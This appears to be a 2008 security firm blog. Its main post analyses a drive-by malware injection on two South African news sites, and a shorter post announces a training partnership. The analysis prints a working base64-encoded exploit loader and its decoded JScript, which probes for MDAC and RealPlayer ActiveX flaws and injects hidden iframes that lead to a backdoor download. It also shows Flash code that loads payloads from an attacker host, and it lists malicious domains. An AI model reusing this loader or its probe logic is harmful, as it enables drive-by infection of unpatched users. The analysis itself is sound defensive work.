Thursday, June 12, 2008

Zone-h Partnership



I am pleased to announce that Telspace Systems has officially signed a training partnership agreement with Zone-h.

This opens new doors for Zone-h in the South African region; it also allows us, as exclusive partners, to market their courses locally in South Africa.

We will be kicking off the first Zone-h training session on the 23rd and 24th of September 2008, with Hands-On-Hacking Unlimited. A full training schedule will be available on our website in the next week or so (you can always email us for a copy too). I strongly suggest you attend the initial training session, as Roberto himself will be coming down to Johannesburg to present the course with us.

Tuesday, June 3, 2008

Silent Love China - Reference to sabc.co.za and reportstar.net hax

After a bit of excitement in the office about yesterday’s post, we decided to do a bit of analysis on the worm that hit the SABC and Reportstar (time constraints applicable).

We obviously used our limited time trying to find out exactly what htm files, javascript, swf and exe’s we could get out, and what exactly they did.

The files which we are currently storing in our lab are:

m.js – Entry injection page

1847687.js – “// A Popular Free Statistics Service for 100 000+ Webmasters.”

456.htm – Loads 4561 or 4562 (swf)

4561.swf – we decompiled this

4562.swf – we decompiled this too

am6.htm - links to both http://ph.errtys.org/ax14.htm and http://ph.errtys.org/re10.htm - also includes activex objects and iframes of http://ph.errtys.org/axlz.htm and http://ph.errtys.org/re11.htm .

ax14.htm – javascripts and vbscript

axlz.htm - more scripts

bak.exe – l33t Trojan

dj – base64

dj.htm – includes “by shadow MSN:kiss117276@live.cn email:kiss117276@163.com” and the base64. Microsoft Data Access Components (MDAC) Function (MS06-014).

dj.output.base64.decode – output of the base64 – jscript and "Adodb.Stream"

re10.htm – Javascript + base64

re11.htm – Javascript – including the interesting text “fuckyoukaspersky”

All these files come from iframes or links in the source code, which originally pointed to http://www.dota11.cn/m.js.

A fantastic sitemap by Jeremy Conway details things very well:

Now if we take a look at dj.htm:

<.HTML>

<.BODY>

<.title>by shadow MSN:kiss117276@live.cn email: kiss117276@163.com

<.script>

// Standard JavaScript base64 decoder carried by the page; the loop bodies below were
// eaten by the blog's HTML rendering and are restored to the usual form of this routine.
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str){
    var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";
    while(i<len){
        // skip characters outside the base64 alphabet, stop at '=' padding
        do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);
        if(c1==-1)break;
        do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);
        if(c2==-1)break;
        out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));
        do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);
        if(c3==-1)break;
        out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3c)>>2));
        do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);
        if(c4==-1)break;
        out+=String.fromCharCode(((c3&0x03)<<6)|c4)
    }
    return out
}

document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZV
hPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQQ3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));

<./script>

<./BODY>

<./HTML>

We decoded this to the following script:

<.script>window.onerror=function(){return true;}<./script>
<.Script Language="JScript">
var cook = "silentwm";

// Cookie helpers: the loader marks each visitor so the exploit chain runs once per day.
function setCookie(name, value, expire)
{
    window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}

function getCookie(Name)
{
    var search = Name + "=";
    if (window.document.cookie.length > 0)
    {
        offset = window.document.cookie.indexOf(search);
        if (offset != -1)
        {
            offset += search.length;
            end = window.document.cookie.indexOf(";", offset)
            if (end == -1)
                end = window.document.cookie.length;
            return unescape(window.document.cookie.substring(offset, end));
        }
    }
    return null;
}

function register(name)
{
    var today = new Date();
    var expires = new Date();
    expires.setTime(today.getTime() + 1000*60*60*24);   // 24 hours
    setCookie(cook, name, expires);
}

function openWM()
{
    var c = getCookie(cook);
    if (c != null)
    {
        return;   // already marked: do nothing on a repeat visit
    }

    register(cook);

    window.defaultStatus="完成";

    // Probe 1: RDS.DataControl / ADODB.Stream, the MS06-014 (MDAC) vector.
    try{ var e;
        var ado=(document.createElement("object"));
        ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
        var as=ado.createobject("Adodb.Stream","")}
    catch(e){};
    finally{
        if(e!="[object Error]"){
            // no error: the control is usable, so load the MDAC page (14.htm)
            document.write("<iframe width=50 height=0 src=14.htm></iframe>")}
        else
        {
            // Probe 2: RealPlayer IERPCtl (the ProgID is assembled from fragments)
            try{ var j;
                var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
            catch(j){};
            finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
                    {document.write('<iframe width=10 height=0 src=rl.htm></iframe>')}
                else
                    {
                    document.write('<iframe width=10 height=0 src=new.htm></iframe>')}}}

                document.write('<iframe width=50 height=0 src=04.htm></iframe>')

            if(j=="[object Error]")
            {location.replace("about:blank");}
        }}
}

openWM();
<./script>

Bear in mind that, for posting this on the blog, we changed a couple of things in the source code; in any event, you should get the idea.

So, this is quite impressive: if your personal configuration does not give any sort of error on creation of the Adodb.Stream object, you will be directed to 14.htm.

From this point, the malicious binary and backdoor “bak.exe” will be downloaded to your computer via the MDAC vulnerability (if you are unpatched, that is).

If any sort of error occurs, a RealPlayer “hax” will be checked for, and this includes several different versions and vulnerabilities.

Once again, if nothing is picked up and any errors occur, you will be taken to rl.htm and your machine will potentially be backdoored. I must stress that if it fails, it will check for several different RealPlayer vulnerabilities, some of which are much more recent (including heap spraying techniques). So, thanks to websites being vulnerable, the general public now has a big issue. Anyway...
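As an added example (not code from the original post), here is a static triage check in Node.js for a saved landing page in the dj.htm style: it peels the base64decode("...") wrapper, folds split string literals such as "IERP"+"Ctl.I"+"ERPCtl.1" so they match, and reports which of the probes and hidden-iframe targets described above are present. The sample page inside it is constructed by hand; only the indicator strings are taken from the decoded script.

```javascript
// Added example, not from the original post: static triage of a saved landing
// page in the dj.htm style. Indicator strings come from the decoded script above.
const INDICATORS = {
  mdac_rds_clsid: /BD96C556-65A3-11D0-983A-00C04FC29E36/i, // RDS.DataControl (MS06-014)
  adodb_stream: /Adodb\.Stream/i,
  realplayer_ierpctl: /IERPCtl\.IERPCtl\.1/i,             // RealPlayer probe
  cookie_gate: /cook\s*=\s*"silentwm"/,                   // run-once-per-day marker
  onerror_silencer: /window\.onerror\s*=\s*function\s*\(\)\s*\{\s*return\s+true/,
};
// Fold "ab"+"cd" into "abcd" so a ProgID split across literals still matches.
function foldStringConcat(js) {
  return js.replace(/"\s*\+\s*"/g, '').replace(/'\s*\+\s*'/g, '');
}
// Replace each base64decode("<b64>") call with its decoded text, repeating so
// that nested wrappers are peeled too. Returns the final text and layer count.
function peelBase64(html, maxLayers = 5) {
  const call = /base64decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)/g;
  let text = html;
  let layers = 0;
  for (; layers < maxLayers; layers++) {
    call.lastIndex = 0;
    if (!call.test(text)) break;
    text = text.replace(call, (_, b64) =>
      Buffer.from(b64.replace(/\s+/g, ''), 'base64').toString('utf8'));
  }
  return { text, layers };
}
// Decode, fold, then report matched indicators and hidden-iframe targets.
function triage(html) {
  const { text, layers } = peelBase64(html);
  const folded = foldStringConcat(text);
  const findings = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(folded));
  const iframeTargets = [];
  const iframe = /<iframe[^>]*\bheight=0\b[^>]*\bsrc=([^\s>'"]+)/gi;
  for (let m; (m = iframe.exec(folded)) !== null;) iframeTargets.push(m[1]);
  return { layers, findings, iframeTargets };
}
// Constructed sample: a hand-written, cut-down loader with the same probes as
// the real page, wrapped in base64 the way dj.htm wraps its payload.
const INNER = 'window.onerror=function(){return true;}var cook="silentwm";' +
  'ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");' +
  'var as=ado.createobject("Adodb.Stream","");' +
  'document.write("<iframe width=50 height=0 src=14.htm></iframe>");' +
  'var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");' +
  "document.write('<iframe width=10 height=0 src=rl.htm></iframe>');";
const SAMPLE = '<html><body><script>document.write(base64decode("' +
  Buffer.from(INNER).toString('base64') + '"));</script></body></html>';
console.log(JSON.stringify(triage(SAMPLE)));
```

Run it against a page saved with wget or from a proxy cache; a non-empty findings list or any hidden-iframe target is the cue to pull the referenced files for the kind of analysis above.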

123.htm carries exactly the same script as dj.htm above (again edited for the blog post).

There are actually 2 separate files that have the same content as per above, but both of them are hosting malicious swf files. In addition, different browsers are served different files (i.e. 4561.swf and 4562.swf).

Decompiling the Flash objects yielded ActionScript that loads other movies:

4561.swf

// fVersion is the installed Flash Player version string (slash syntax for _root.$version),
// so the movie fetched next is chosen by player version
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();

4562.swf

// same selection, different movie name suffix
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'f.swf', _root);
stop();

These refer to instances of swf files which are dangerous and obviously relate to the Adobe Flash Player vulnerabilities. There are also other functions which load in the Trojan “bak.exe” via RDS.DataControl (MS06-014), which we mentioned earlier.

Please take into account the severity of this issue, and obviously the huge impact. The general end user who visits these websites is usually not up to date with versions of RealPlayer, Flash and, obviously, Microsoft updates.

Take into account that this was also done in very little time, just to check the possible impact by visiting those two sites. If anyone wants a copy of the above files for any sort of analysis, please do let us know and we would be more than happy to send them across.

All users that visited sabc.co.za or reportstar.net in the last little while should be aware that, if they had/have vulnerable versions of RealPlayer/Shockwave/Microsoft MS06-014, they are probably infected and carrying a backdoor. In addition to this, all the stats are well logged for the guys to see exactly what’s going on in their little game.

Monday, June 2, 2008

Adobe Flash Attacks and more..

A security hole has recently been discovered in Macromedia Shockwave Flash allowing attackers to compromise machines that haven't applied the relevant patches. A large number of sites (even local co.za sites) have been compromised and are still hosting the malicious content, which is affecting end users.

Please download the patch or the updated package and install from here:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

It is critical that you apply this patch as soon as possible to avoid your machine being compromised.

More about this can be read on:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527

In other news, it seems that www.sabc.co.za and www.reportstar.net were hit by instances of injection (no links added for obvious reasons). This was confirmed by several clients emailing us about it. The websites should still be visible on Google for confirmation.

The source code of www.sabc.co.za and www.reportstar.net both included:

http://www.dota11.cn/m.js - as of morning of 2nd June 2008.

You can read up more about it at:

http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1